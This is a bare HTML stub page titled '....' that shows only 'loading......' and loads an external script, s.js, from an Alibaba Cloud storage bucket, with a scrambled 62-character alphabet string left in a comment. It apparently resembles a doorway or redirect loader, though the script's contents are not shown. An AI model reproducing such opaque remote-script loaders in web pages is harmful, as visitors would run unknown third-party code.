<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta content="width=device-width,initial-scale=1,user-scalable=0,minimum-scale=1,maximum-scale=1" name="viewport" />
<meta content="yes" name="apple-mobile-web-app-capable" />
<meta content="black" name="apple-mobile-web-app-status-bar-style" />
<meta content="no" name="msapplication-tap-highlight" />
<meta content="IE=edge" http-equiv="X-UA-Compatible" />
<title>....</title>
<script src="//kmdns.oss-cn-shanghai.aliyuncs.com/s.js"></script>
<!-- CUGW1xoYOza6tkKq5BVmRnH8P9QAXrTh4Dyv3sucFMEiN2f7lLZb0jpweJIdgS -->
</head>
<body>
loading......
<li style="display: none;"></li>
</body>
</html>
